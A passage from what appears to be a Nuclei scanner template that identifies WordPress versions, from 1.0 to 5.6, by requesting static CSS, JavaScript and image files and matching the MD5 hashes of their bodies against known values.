"(\"67f40a30bfa13743e5c4e86bfa467a90\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"aa851d7ff94a60fee301e64fdd9d932b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"b648dcfda6e61acff51cedf8b0f5bfcd\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"680f6b9e75cb52aa0d40396b0cf792e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-widgets.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0644973027df3f85de27c60da2f331ec\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"b8abf8533b9e8ed351e6f32b2b2e49c8\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"1c97af19b90531018baaebef22409f09\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"836b211538c005fe30eeeac5cb77f1ea\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"eefa6b818378b15f66df7ae4e4bcc1a7\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"868832fcafbffba43f5ba4fbf31d3ca5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ca4ef58229b7d12a77bb60cc6ea231d2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"acd03e77aacb18576947d110cca65544\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"93ac996cd96a82677bf4bbd232f7fb36\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"99cdc663d5a19b883273cc555870d62f\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"72dd5584fa727bd5baacf7dad434e8e1\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"762e45e43b243cdd5613822eccdb17c6\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"f422c35039c6734975166686fc7af611\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-widgets-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"5965d62fa0d33a604e31b2881b6c5bfa\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"bc6035ebcc286399ae80c63933562faa\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"4720a573460d8da3d0963651bdaec68c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"143a3d5327d5d29e881ebb29ceefacd3\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"1ca6e43e5d42931eee34e8be303da579\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"86d0504f3f24934ce87ed755d6d16a98\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"1755ee3900efb17a46a759c8572dc567\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"279416d29c68b762749a15d4519668b5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1e6b1ae2030a4587df5918fbd8d42d50\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"89b4d71e95967154937c6c048763b7a6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"7a8fa3d526d993a0cc51ee54c37c9b70\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"1dc14d3cebe57f518905d426b4803183\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"dd3522e0b40b9053c20ddfb4d5f77d3d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-embed-template.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"c01952804cd717c96afe10e9689bbd32\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"58d51bdeef6c8132410f1a7af5be8eec\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"7b0e9fbc77ba53dac197347efddb1e71\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"61723e2c0626c3699227340874240412\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"97969382af4adc0bd1376c79a17aadc1\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"a4809c461ae933672aff7c1ba04a47b0\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"6bd3bd8591e2514b36cab474effcbbe4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/sodium_compat/LICENSE" - matchers: - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"f578e4bb36468303006691e1a00ef996\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.3 - dsl: - - "(\"02c9c94b41a1e8638cbca074f88626f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-a11y.min.js" - matchers: - - type: dsl - name: 4.8 - 5.2.2 - dsl: - - "(\"7fb5f1a0757b4fc79ac7c5b1920e0f8e\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"fadd746cdddaafb9978cbab2e4e4580f\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"860cbbecce6b0a5fcbb0c0faa956011a\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7fc4397387256fc4d513baf001563c34\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"5101bab08ad453ef4ef7313918074a14\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-a11y.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"06817ec8f4ac54ab29fbd71a8c3d1439\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"201a720227378280081f67809d781ab2\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"807223bbf40755fb69e7a55413c63a4d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9496a3e87aed4ca075c24a6710fadd6b\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"711c49a2ed00535aa8aa3fc7af0a2420\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"e1833e40af087af9c866a143327930cf\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"cd187287656f5a29a85e557f572f3edc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-sanitize.js" - matchers: - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"c82ddb34090cba66aff7d12291e75f21\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"60dfe49df8846db04ec663ab443f9779\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.6 - dsl: - - "(\"be9dc83a6b99eaf3458b743651d01b99\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"fc31bb3d75b7635ca8249600a9884236\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"dce840159a3f860c4ff689aa2cd11428\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"f197cd93b28210923e3590c4438eb896\" == md5(body))" - - type: dsl - name: 4.1 - 4.4.24 - dsl: - - "(\"d810b096023695b38bf682f20774af98\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"15d11156e6d93cd993e75971fb61712c\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ee5f5ccfd4888467dd6416394b03f9d0\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"0ff73636f81476df81569e7ea7877b00\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.2 - dsl: - - "(\"5ef8706c50672b8945100bf3bba5ecc6\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"c221f3fd3ce085bb175deabbd1720788\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"a52a04f149c6e052aeb22456a611480c\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.2 - dsl: - - "(\"da71d62b165ecde69d1b7afb554ebb79\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"b0f6565c1b120a5dcce1014bfb7327a0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.9.5 - dsl: - - "(\"64b892be1df127fa6a45d6b47c0a3555\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"6a5d784c2ac2ce5f64e0968c35492f03\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"0001917ebec06ecb3fbf863f38f4af52\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f26aeec9641346d082e288224578f806\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"105456f4e72329e3be147bf4fabf12b7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"4370bc17007bd940b24ba43a1e07a9d0\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"8b7d4426c90a3e383fdc90fe93eb317f\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"24aff27983cef631454c00e6c77ac213\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"1f951b112676690e39c4ae9463769a8b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"c6f58718992eea8c2d40b6220ab9e21d\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"a699cf8ec50c40ef2f404dfc6df34ed9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/link/plugin.js" - matchers: - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"39bd1f3127ddd31725a07ebc87c4b858\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"8abb2c35fcbf0e1a3819704181a46f44\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"fbf53969b19e593f224ffab41eeaf4fb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"7ca5d1131a7b8743f4687078bf038a89\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.6 - dsl: - - "(\"f82a4e04c8926d51b90680aecc07b9c3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/categories.min.js" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/categories.js" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"6fc0b70ea1595374c54e9d51aad4aa7f\" == md5(body))" - - type: dsl - name: 2.9 - 3.4.2 - dsl: - - "(\"048d156901f50fbe55169e2fa4b1c396\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"80b80ef0cb2360338c6e4668829ad013\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"1227fa15e7578a3763e8a23eb2a376c2\" == md5(body))" - - type: dsl - name: 2.5 - 2.6.5 - dsl: - - "(\"21bb0d381c89ce4a10a10d02e32cf0f6\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-fields.js" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"87be866a7cdc94d840e6ed570c01efdd\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.2 - dsl: - - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" - - type: dsl - name: 2.8 - 3.1.4 - dsl: - - "(\"14698a9d69a9256b8b63e1552dc85f06\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"29b80d93f3d1b24bd5529c23acd1719a\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/custom-fields.min.js" - matchers: - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4aeed8cd81abc96d27e7a6925d758ee2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/Thumbs.db" - matchers: - - type: dsl - name: 1.0.1-miles - 1.0.2 - dsl: - - "(\"c7aba2c49bbb10b312042ffdf586c765\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/menu.txt" - matchers: - - type: dsl - name: 1.0-platinum - 1.0.2 - dsl: - - "(\"702312cb8ae561fa80b59be708ef6cd2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-2.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"de5cf34823da2cfed273b9c8cf52248a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/star.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"888920359f8931eb72582d0c352722ff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-3.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"a5b70a894f90cf8574284b7296f7661c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-9.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"4eda31d251821e5d6e5ed9cad411434f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-0.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"745de19d2c08e95dfa07113d16d77ace\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-6.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"7320c171d53bc359b0cd7ae1b53774d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-7.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"a8cbf1fe3a498f4a20abd6768a46de7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-8.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"c5cb7ee14792e1658bc0663014d37f65\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-4.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"aa064cadd0f43c0352607dad68bc5af2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-1.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"bdc9ea72a16082ff4d0ac730f090e0d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/tick.png" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"9a0f4a15dd2be4db7bbcea535764158c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/links/rating-5.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"42698681e4d8734c2932c2415b94b713\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/wp-favicon.png" - matchers: - - type: dsl - name: 1.2-delta - 1.2.2 - dsl: - - "(\"918e3fd1705aedabf581fe9ec02aaaf1\" == md5(body))" - - type: dsl - name: 1.0.1-miles - 1.2.1 - dsl: - - "(\"b8e308c594171cb691807867733648a6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/xml.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.2.2 - dsl: - - "(\"e67c90a18c89f8d05125c045b2978dcf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/wp-small.png" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"2e6a6066f3baa2d9f633350759ccf14c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/get-firefox.png" - matchers: - - type: dsl - name: 1.5.1 - 1.5.2 - dsl: - - "(\"93e1d3f3524f4fc80491af0b77b12383\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/header-shadow.png" - matchers: - - type: dsl - name: 1.2-delta - 1.5.2 - dsl: - - "(\"3311f3d78a8001132cd15149441f8711\" == md5(body))" - - type: dsl - name: 1.0-platinum - 1.0.2 - dsl: - - "(\"4a1ecae7bc70f3ee911fc29e98ca0dab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/fade-butt.png" - matchers: - - type: dsl - name: 1.2-delta - 1.5.2 - dsl: - - "(\"e6c8b1c6db50db66bf04da9bbbe3ee0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/wpminilogo.png" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"2f58b9a016e6da1012819decfc6dd331\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_question.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"0518596a4eb94c32a2b2ed898bdc3549\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_neutral.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"4e8b7a51c7f60a2362a4f67fbbc937e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_sad.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"5a50535a06def9d01076772e5e9d235b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_biggrin.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"f970a6591668c625e4b9dbd3b7a450d7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_surprised.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"ae735b5dd659dc4b3b0f249ce59bef79\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_wink.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"f058206bb8ff732dbe8e7aa10d74c9cd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_cool.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"25c83ea511f206e88f214719dad9c88c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_confused.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"4affed1b55e5f73c9f0675ae7d0ad823\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_redface.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"d7e9d095432cbcf09375ffc782c30c23\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_cry.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"7605eca95aaeda46e641745ef6f0e0b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_smile.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"9ee646ffab71107d1a11407be52f33a5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_evil.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"178255bb3fe2c3aa790c1f8ec8738504\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_mrgreen.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"54e8505227edae1e583cf2f9554abc3a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_idea.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"aaebc9c048367118ba65e1da46bc3e08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_razz.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"7aec68426aa06f01e2b1ac250e5aee62\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_lol.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"b76e7729d43c4a49182d020741285bef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_rolleyes.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"19071b1af987946e96dcef6ce0611c6b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_exclaim.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"da86bbf377f97d06047aa781a582c52f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_mad.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"e4355c00894da1bd78341a6b54d20b56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_twisted.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"c9c3d12da1e9da699e490b86d24eee85\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_arrow.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"394bffa679f650b7d2f22aa263cc06ba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-images/smilies/icon_eek.gif" - matchers: - - type: dsl - name: 1.0-platinum - 1.5.2 - dsl: - - "(\"52e43743e38a67d5d28845a104ca8c7d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dbx-key.js" - matchers: - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"a59a1ff8f5f9e0539aa2ed4fa55ef786\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/list-manipulation.js" - matchers: - - type: dsl - name: 2.0.4 - 2.0.11 - dsl: - - "(\"cfe80cd05aabaaad96cf79c6239a3e40\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.1 - dsl: - - "(\"3c6adf4762efcaae44a38e58546b0ede\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/license.html" - matchers: - - type: dsl - name: 2.0 - 2.2.3 - dsl: - - "(\"46c1f90a66583219a5f60451a3f3244e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/install.css" - matchers: - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"234fed47c9eef92ca35985d459a99dbf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/dbx-admin-key.js" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/edit-comments.js" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"8b98dc81013e5510adde5c9280c410b6\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"c760347780287cbf8cf9baeb4c414c69\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/categories.js" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"27370aa117d13ca66a89b852bf80ac29\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"feedd6ae867a53792e962dc8dbf4e24c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/upload.css" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"4d0c00b676ecb011dfdc74f8ceccf94b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/cat.js" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"c3ed1d4a7f90e5fc6c067e3565909868\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/users.js" - matchers: - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"ef8872688bcab72a712e681b5bdd0c36\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/upload.js" - matchers: - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"12d5041ec2286e75628d255c6bdca9b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/upload-rtl.css" - matchers: - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"6ac6023d409ec51409d67d7ee6b5a1b4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/xfn.js" - matchers: - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"c77c9e9a636feadfd1b2d7c07e2f2ba9\" == md5(body))" - - type: dsl - name: 2.0.1 - 2.0.11 - dsl: - - "(\"1725d155e16823dc41c38aa8ba286e4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/custom-fields.js" - matchers: - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"5b555632a4efda6f8419e1bff3e35cd9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/WpComments.png" - matchers: - - type: dsl - name: 2.3.1 - 2.3.3 - dsl: - - "(\"f12204bb737213d9c0b530b918da182d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/WpWatermark.png" - matchers: - - type: dsl - name: 2.3.1 - 2.3.3 - dsl: - - "(\"c5a6a59365ad54aa20c71e79da9dfd7a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/images/wlw/WpIcon.png" - matchers: - - type: dsl - name: 2.3.1 - 2.3.3 - dsl: - - "(\"e44d22b74f7ee4435e22062d5adf4a6a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/list-manipulation.js" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"4e420736ce40b9b74fa4c33a542a1554\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dbx.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"33c7eab1039d3730275aa1006a4dbfaa\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"40a9779c3c1c85fa6c809f73e63aa2da\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/fat.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"c6f7565dd1534de02ff7abc431afb042\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"a21e15fafb4f7e5a8d63da28629e7372\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/about.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"e2797544e2ff9d93619115c814cb499b\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"0d8231212de38ac33fc0acc47640532c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/charmap.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"f2be81dcf588ab0c63f38c8e784f5b92\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"a7adfd8471aa61e073761c6e493fc888\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/color_picker.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"daa32e73b70e34bf35af84c88dd66202\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"1060329ab7d7e40013624a3870a45bc5\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"1cdc347fadca8d396fc114e473c8c8ee\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"0ff9bfe2714875340d9e59fd53c6a379\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/source_editor.js" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - 